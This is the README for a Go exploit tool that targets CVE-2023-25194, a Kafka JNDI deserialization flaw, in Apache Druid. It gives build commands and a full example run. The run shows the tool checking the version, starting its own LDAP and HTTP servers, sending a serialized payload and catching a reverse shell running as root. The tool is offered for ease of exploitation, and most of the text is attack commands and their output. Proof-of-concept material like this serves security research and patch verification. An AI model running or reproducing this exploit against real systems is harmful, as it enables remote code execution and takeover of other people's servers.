# Apache Druid CVE-2023-25194

CVE-2023-25194 is a deserialization vulnerability affecting Apache Kafka. This go-exploit demonstrates exploiting CVE-2023-25194 against Apache Druid (using Kafka). This type of attack typically requires an LDAP JNDI attacker infrastructure that is normally spread across a couple of tools. However, all of that is built into the go-exploit for ease of exploitation.

## Compiling

To build the exploit into a docker image simply:

make docker

If you have a Go build environment handy, you can also just use `make`:

albinolobster@mournland:~/cve-2023-25194$ make
gofmt -d -w cve-2023-25194.go 
golangci-lint run --fix cve-2023-25194.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-25194_linux-arm64 cve-2023-25194.go

## Example Output

albinolobster@mournland:~/cve-2023-25194$ ./build/cve-2023-25194_linux-arm64 -c -e -rhost -lhost -lport 1270 -ldapAddr -httpAddr
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting listener on"
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting target" index=0 host= port=8888 ssl=false "ssl auto"=false
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Running a version check on the remote target" host= port=8888
time=2024-03-15T16:02:31.268-04:00 level=VERSION msg="The self-reported version is: 25.0.0" host= port=8888 version=25.0.0
time=2024-03-15T16:02:31.268-04:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host= port=8888 vulnerable=yes
time=2024-03-15T16:02:31.268-04:00 level=STATUS msg="Starting LDAP server on"
time=2024-03-15T16:02:33.271-04:00 level=STATUS msg="Starting HTTP Server on"
time=2024-03-15T16:02:33.335-04:00 level=SUCCESS msg="Received a bind request!"
time=2024-03-15T16:02:33.343-04:00 level=SUCCESS msg="Serialized payload sent!"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit completed"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit successfully completed" exploited=true
time=2024-03-15T16:02:33.640-04:00 level=SUCCESS msg="Caught new shell from"
time=2024-03-15T16:02:33.640-04:00 level=STATUS msg="Active shell from"
bash: cannot set terminal process group (41): Inappropriate ioctl for device
bash: no job control in this shell
root@8e8d1ce79210:/opt/druid# id
uid=0(root) gid=0(root) groups=0(root)